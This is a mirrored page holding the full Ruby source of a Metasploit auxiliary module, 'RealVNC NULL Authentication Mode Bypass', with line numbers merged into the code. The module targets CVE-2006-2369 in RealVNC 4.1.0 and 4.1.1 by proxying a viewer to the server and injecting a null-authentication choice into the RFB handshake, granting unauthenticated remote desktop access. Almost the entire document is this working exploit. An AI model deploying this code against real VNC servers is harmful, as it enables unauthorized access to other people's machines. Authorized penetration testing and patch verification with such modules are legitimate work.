CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp78def initialize(info = {})9super(update_info(info,10'Name' => 'RealVNC NULL Authentication Mode Bypass',11'Description' => %q{12This module exploits an Authentication bypass Vulnerability13in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy14listener on LPORT and proxies to the target server1516The AUTOVNC option requires that vncviewer be installed on17the attacking machine.18},19'Author' =>20[21'hdm', #original msf2 module22'theLightCosine'23],24'License' => MSF_LICENSE,25'References' =>26[27['BID', '17978'],28['OSVDB', '25479'],29['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'],30['CVE', '2006-2369'],31],32'DisclosureDate' => '2006-05-15'))3334register_options(35[36OptPort.new('RPORT', [true, "The port the target VNC Server is listening on", 5900 ]),37OptPort.new('LPORT', [true, "The port the local VNC Proxy should listen on", 5900 ]),38OptBool.new('AUTOVNC', [true, "Automatically launch vncviewer from this host", false])39])40end4142def run43# starts up the Listener Server44print_status("Starting listener...")45listener = Rex::Socket::TcpServer.create(46'LocalHost' => '0.0.0.0',47'LocalPort' => datastore['LPORT'],48'Context' => { 'Msf' => framework, 'MsfExploit' => self }49)5051# If the autovnc option is set to true this will spawn a vncviewer on the local machine52# targeting the proxy listener.53if (datastore['AUTOVNC'])54unless (check_vncviewer())55print_error("The vncviewer does not appear to be installed, exiting...")56return nil57end58print_status("Spawning viewer thread...")59view = framework.threads.spawn("VncViewerWrapper", false) {60system("vncviewer 127.0.0.1::#{datastore['LPORT']}")61}62end6364# Establishes the connection between the viewier and the remote server65client = listener.accept66add_socket(client)6768# Closes the listener socket as it is no longer needed69listener.close7071s = connect7273serverhello = s.get_once74unless serverhello.include? "RFB 003.008"75print_error("The server is not vulnerable")76return77end7879# MitM attack on the VNC Authentication Process80client.puts(serverhello)81clienthello = client.get_once82s.puts(clienthello)8384authmethods = s.read(2)8586print_status("Auth methods received. Sending null authentication option to client")87client.write("\x01\x01")88client.read(1)89s.put("\x01")90s.read(4)91client.put("\x00\x00\x00\x00")9293# Handles remaining proxy operations between the two sockets94closed = false95while(closed == false)96sockets =[]97sockets << client98sockets << s99selected = select(sockets,nil,nil,0)100#print_status ("Selected: #{selected.inspect}")101unless selected.nil?102103if selected[0].include?(client)104begin105data = client.get_once106if data.nil?107print_error("Client closed connection")108closed = true109else110s.put(data)111end112rescue113print_error("Client closed connection")114closed = true115end116end117118if selected[0].include?(s)119begin120data = s.get_once121if data.nil?122print_error("Server closed connection")123closed = true124else125client.put(data)126end127rescue128closed = true129end130end131end132end133134# Close sockets135s.close136client.close137138if (datastore['AUTOVNC'])139view.kill rescue nil140end141end142143def check_vncviewer144vnc =145Rex::FileUtils::find_full_path('vncviewer') ||146Rex::FileUtils::find_full_path('vncviewer.exe')147if (vnc)148return true149else150return false151end152end153end154155156